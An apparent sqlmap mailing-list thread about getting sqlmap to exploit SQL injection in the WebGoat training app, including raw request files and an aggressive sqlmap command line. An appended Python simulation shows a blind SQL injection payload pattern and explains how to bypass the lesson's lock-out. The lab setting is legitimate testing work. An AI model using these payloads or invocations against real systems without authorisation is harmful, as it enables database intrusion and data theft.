Hi. There has been a lot of work here. Please update to the latest revision and retry it again.

One word of advice regarding WebGoat. It has a bad routine that automatically closes the SQLi after it finds certain keywords in requests. Basically, afterwards it just says "* Congratulations. You have successfully completed this lesson." and prevents further injection. Hence, you'll need to use --safe-url and --safe-freq to reset those. Please find details further in the pastebin links.

Here you can find a couple of different runs:

--technique=B: http://pastebin.com/04z2x00S
(no technique constraints): http://pastebin.com/UhGQLyTp

Bye

On Tue, Oct 13, 2015 at 10:18 AM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:

> Hi.
>
> There is still more work here to be done. Will let you know. I am going to try to finish it today.
>
> Bye
>
> On Tue, Oct 13, 2015 at 10:13 AM, Vojtěch Polášek <krec...@gmail.com> wrote:
>
>> Greetings,
>> I still have problems exploiting HSQL databases. current-user is still returning garbled characters etc.
>> Is it still working for you?
>> Thanks,
>> Vojta
>>
>> On 10.10.2015 at 01:35, Miroslav Stampar wrote:
>>
>> I've used that same request file without any problems (with latest patches/revision). Will retest tomorrow. Please retry everything with --flush-session
>>
>> Bye
>>
>> On Oct 10, 2015 1:17 AM, "Vojtěch Polášek" <krec...@gmail.com> wrote:
>>
>>> Greetings,
>>> thanks for your prompt response.
>>> Unfortunately, it is still not working as expected.
>>> There is a problem with retrieving the current user and information from the HSQL database in general.
>>> Moreover, when using the following request file from the same application, sqlmap identified the backend database as PostgreSQL instead of HSQL.
>>> This request is from the lesson about simple string SQL injection.
>>>
>>> #begin request file
>>> POST /WebGoat/attack?Screen=36&menu=1100 HTTP/1.1
>>> Host: localhost:8080
>>> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
>>> Accept: */*
>>> Accept-Language: cs,en-US;q=0.7,en;q=0.3
>>> Accept-Encoding: gzip, deflate
>>> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
>>> X-Requested-With: XMLHttpRequest
>>> Referer: http://localhost:8080/WebGoat/start.mvc
>>> Content-Length: 29
>>> Connection: keep-alive
>>> Pragma: no-cache
>>> Cache-Control: no-cache
>>> Cookie: JSESSIONID=valid_cookie
>>>
>>> account_name=Smith&SUBMIT=Go!
>>> #end request
>>>
>>> Feel free to ask me for more debugging information, I will be glad to help you.
>>> Thanks for your work,
>>> Vojta
>>>
>>> On 9.10.2015 at 16:52, Miroslav Stampar wrote:
>>>
>>> Fixed tons of bugs and pushed. Please retry it again.
>>>
>>> Bye
>>>
>>> On Fri, Oct 9, 2015 at 3:55 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>>>
>>>> Please wait a bit. There are tons of bugs for HSQLDB in sqlmap. On it right now.
>>>>
>>>> Bye
>>>>
>>>> On Fri, Oct 9, 2015 at 2:20 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>>>>
>>>>> Hi again.
>>>>>
>>>>> Please update to the latest revision and retry it again (with --flush-session).
>>>>>
>>>>> Backend used is HSQLDB while sqlmap wrongly recognized it as MySQL (because HSQLDB is a MySQL look-alike).
>>>>>
>>>>> Bye
>>>>>
>>>>> On Fri, Oct 9, 2015 at 12:49 PM, Vojtěch Polášek <krec...@gmail.com> wrote:
>>>>>
>>>>>> Hi,
>>>>>> You can download WebGoat here:
>>>>>> https://webgoat.atlassian.net/builds/browse/WEB-WGM/latestSuccessful/artifact/shared/WebGoat-Embedded-Tomcat/WebGoat-6.0.1-war-exec.jar
>>>>>> Just run: java -jar WebGoat-6.0.1-war-exec.jar
>>>>>> And you can log in at localhost:8080/WebGoat with name webgoat and password webgoat.
>>>>>> The request file posted earlier is from the Blind numeric SQL injection lesson.
>>>>>> The application is written in Java and runs on an embedded Tomcat 7 server.
>>>>>> I am using this command, where "request" is the request file posted earlier and valid_cookie is simply a valid cookie:
>>>>>>
>>>>>> python2 /opt/sqlmap/sqlmap.py -r request --level=5 --risk=3 -o --cookie="JSESSIONID=valid_cookie" -v3
>>>>>>
>>>>>> As I stated earlier, sqlmap finds the vulnerability but can't exploit it. I tried almost all tamper scripts, even some combinations, but no success.
>>>>>> I wanted to show exploitation of WebGoat, because I would like to use sqlmap for testing a commercial application which is based on similar technologies.
>>>>>> Thank you,
>>>>>> Vojta
>>>>>>
>>>>>> On 9.10.2015 at 11:16, Miroslav Stampar wrote:
>>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> Can you please send the used sqlmap command along with basic info on the vulnerable environment (e.g. just a plain WebGoat, URL this and that)?
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Thu, Oct 8, 2015 at 10:52 PM, Vojtěch Polášek <krec...@gmail.com> wrote:
>>>>>>
>>>>>>> Greetings,
>>>>>>> I am running WebGoat from a standalone jar file, so I can't see any logs.
>>>>>>> I will try to see some logs from inside the application. Anyway, I didn't expect this application to contain any kind of filtering.
>>>>>>> I hope to show sqlmap in action to some people from a large company and I wanted to use something simple, therefore I am quite surprised. I have never seen this situation - found injection but no possibility of exploitation.
>>>>>>> The between tamper script didn't help.
>>>>>>> Any suggestions are welcome.
>>>>>>> Thanks,
>>>>>>> Vojta
>>>>>>>
>>>>>>> On 8.10.2015 at 18:10, Brandon Perry wrote:
>>>>>>>
>>>>>>>> You should look in the logs of the web server and see what they say.
>>>>>>>>
>>>>>>>> I bet you need --tamper=between
>>>>>>>>
>>>>>>>> Sent from a phone
>>>>>>>>
>>>>>>>> On Oct 8, 2015, at 10:33 AM, Vojtěch Polášek <krec...@gmail.com> wrote:
>>>>>>>>
>>>>>>>>> Greetings,
>>>>>>>>> I tried to verify sqlmap's functionality by running it against WebGoat version 6.0.1. You can try it yourself by using the following request file. Just log in and replace the cookie with a valid one.
>>>>>>>>>
>>>>>>>>> ###start request file
>>>>>>>>> POST /WebGoat/attack?Screen=4&menu=1100 HTTP/1.1
>>>>>>>>> Host: localhost:8080
>>>>>>>>> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
>>>>>>>>> Accept: */*
>>>>>>>>> Accept-Language: cs,en-US;q=0.7,en;q=0.3
>>>>>>>>> Accept-Encoding: gzip, deflate
>>>>>>>>> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
>>>>>>>>> X-Requested-With: XMLHttpRequest
>>>>>>>>> Referer: http://localhost:8080/WebGoat/start.mvc
>>>>>>>>> Content-Length: 29
>>>>>>>>> Cookie: JSESSIONID=replace
>>>>>>>>> Connection: keep-alive
>>>>>>>>> Pragma: no-cache
>>>>>>>>> Cache-Control: no-cache
>>>>>>>>>
>>>>>>>>> account_number=101&SUBMIT=Go!
>>>>>>>>> #end request file
>>>>>>>>>
>>>>>>>>> I am running git master of sqlmap.
>>>>>>>>> sqlmap detects SQL injection (boolean-based blind MySQL), but no information gathering commands work (--dbs, --current-user...). I tried running with --hex or --no-cast, but no luck.
>>>>>>>>> What might be the problem?
>>>>>>>>> Thanks,
>>>>>>>>> Vojta
>>>>>>>>>
>>>>>>>>> ------------------------------------------------------------------------------
>>>>>>>>> _______________________________________________
>>>>>>>>> sqlmap-users mailing list
>>>>>>>>> sqlmap-users@lists.sourceforge.net
>>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
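The lock-out described at the top of the thread, and why --safe-url/--safe-freq work around it, as an added simulation. This is example code written for this page, not sqlmap or WebGoat code and not anything posted in the thread. Everything in it is constructed: the LessonTarget class, its LOCK_KEYWORDS list, the `secret` column in the probe, the restart() "safe" request and the leaked value "SA" are assumptions; only the flag names --safe-url and --safe-freq, the "Congratulations" text and the boolean-blind technique come from the thread.

```python
"""Constructed simulation: a WebGoat-style lesson that "completes" itself once it
sees injection keywords, and the effect of resetting it every N test requests,
which is what sqlmap's --safe-url/--safe-freq do. Not sqlmap or WebGoat code."""
import re

SECRET = "SA"                              # assumption: value the oracle leaks
LOCK_KEYWORDS = ("substring", "ascii")     # assumption: keywords that "complete" the lesson
DONE_PAGE = "* Congratulations. You have successfully completed this lesson."


class LessonTarget:
    """Toy stand-in for the lesson endpoint (not WebGoat code).

    Acts as a boolean-based blind oracle until a request carries one of
    LOCK_KEYWORDS; that request is still answered normally, but every later
    request gets DONE_PAGE whatever the payload says.
    """

    def __init__(self):
        self.completed = False
        self.requests = 0

    def attack(self, account_name):
        """Stand-in for POST /WebGoat/attack: returns the page body for a payload."""
        self.requests += 1
        if self.completed:
            return DONE_PAGE
        lowered = account_name.lower()
        # Instead of running SQL, parse the probe shape this example uses:
        #   Smith' and ascii(substring(secret,POS,1))>VAL and 'a'='a
        m = re.search(r"substring\(secret,(\d+),1\)\)>(\d+)", lowered)
        truth = True                       # a plain "Smith" lookup finds a row
        if m:
            pos, val = int(m.group(1)), int(m.group(2))
            truth = pos <= len(SECRET) and ord(SECRET[pos - 1]) > val
        if any(k in lowered for k in LOCK_KEYWORDS):
            self.completed = True          # lock *after* answering this one
        return "<tr><td>Smith</td></tr>" if truth else "<tr></tr>"

    def restart(self):
        """The 'safe' request (models --safe-url): puts the lesson back."""
        self.requests += 1
        self.completed = False


def extract(target, length, safe_freq=None):
    """Boolean-blind extraction of `length` chars by binary search over ASCII.

    safe_freq=N models --safe-url URL --safe-freq N: visit the safe location,
    send N test requests, visit it again, and so on. None means never reset.
    """
    out, sent = "", 0
    for pos in range(1, length + 1):
        lo, hi = 0, 127                    # invariant: char value is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if safe_freq is not None and sent % safe_freq == 0:
                target.restart()
            payload = f"Smith' and ascii(substring(secret,{pos},1))>{mid} and 'a'='a"
            sent += 1
            # True/false is decided like a page comparison: does the original
            # "Smith" row come back? The DONE_PAGE never contains it, so once
            # the lesson is locked every probe reads as false.
            if "Smith" in target.attack(payload):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    for freq in (None, 3, 1):
        t = LessonTarget()
        got = extract(t, len(SECRET), safe_freq=freq)
        print(f"safe_freq={freq!s:>4}: got {got!r} in {t.requests} requests")
```

Without a reset the very first keyword-bearing probe locks the lesson and every later probe reads as false, so the binary search drifts to the wrong character (the same kind of garbage as a wrong current-user). With the safe request before every probe (safe_freq=1) the two characters come back correctly, at the cost of one extra request per probe (28 instead of 14 here); a larger frequency only partially repairs the result because the lesson re-locks on the first probe of each window. The sqlmap equivalent is `--safe-url=<URL that restarts the lesson> --safe-freq=1`; the pastebin runs linked in the thread show the exact invocation used there, and the restart URL is whatever your WebGoat build uses, which this example does not know.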